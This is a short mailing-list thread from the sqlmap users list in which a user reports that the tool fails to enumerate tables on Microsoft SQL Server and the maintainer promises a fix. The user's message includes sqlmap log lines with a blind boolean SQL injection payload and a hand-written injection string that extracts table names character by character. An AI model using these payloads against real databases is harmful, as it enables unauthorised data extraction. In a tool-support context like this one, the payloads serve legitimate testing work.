Hi Cats.
Please, wait for day or two and you'll hopefully be able to use sqlmap in
that case too.
Kind regards,
Miroslav Stampar
On Mon, Jan 2, 2012 at 8:01 PM, cats <d...@alcor.se> wrote:
> I can dump users and databases, but not the tables in any database.
>
> Here's some output from sqlmap:
>
> Revision: 4643
>
> [18:58:04] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows Vista
> web application technology: ASP.NET, Microsoft IIS 7.0
> back-end DBMS: Microsoft SQL Server 2008
>
> [18:58:04] [INFO] fetching tables for database: productcatalog
> [18:58:04] [INFO] fetching number of tables for database
> 'productcatalog'
> [18:58:04] [PAYLOAD] 99047' AND ASCII(SUBSTRING((SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> eservice_productcatalog..sysobjects WHERE xtype IN
> (CHAR(117),CHAR(118))),1,1)) > 51 AND 'cfIC'='cfIC
> [18:58:05] [DEBUG] reflective value found and filtered out
>
> It just goes on like this and simply spits out a "retrieved" which is
> empty, and it will continue doing so until it has reached the length of
> the current table. Thus the result will be something like:
>
> dbo.""
> dbo.""
> dbo.""
>
> ...and so on
>
> I wrote a Perl script that could successfully extract the tables from my
> database, using the following injection string.
>
> Clean version of the injection:
>
> AND (
> CASE
> WHEN SUBSTRING((
> SELECT TOP 1 TABLE_NAME FROM (
> SELECT TOP ' . $i . ' TABLE_NAME FROM
> INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG=\'' . $dbname . '\'
> ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC),' . $nc .
> ',1)=char(' . ord(substr($chars,$c,1)) . ') THEN 1 ELSE 2 END)=\'1
>
> So the important part is "SELECT TABLE_NAME FROM
> INFORMATION_SCHEMA.TABLES", as "SELECT name FROM dbname..sysobjects
> WHERE xtype = 'U'" Doesn't seem to work for me.
>
> Has anyone else had this issue?
> Am I doing something wrong, or is this a bug in sqlmap?
> Or maybe it's the configuration on my mssql server?
>
> Anyway, advice is welcome :-)
>
> Cheers!
>
>
>
> ------------------------------------------------------------------------------
> Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
> infrastructure or vast IT resources to deliver seamless, secure access to
> virtual desktops. With this all-in-one solution, easily deploy virtual
> desktops for less than the cost of PCs and save 60% on VDI infrastructure
> costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
infrastructure or vast IT resources to deliver seamless, secure access to
virtual desktops. With this all-in-one solution, easily deploy virtual
desktops for less than the cost of PCs and save 60% on VDI infrastructure
costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
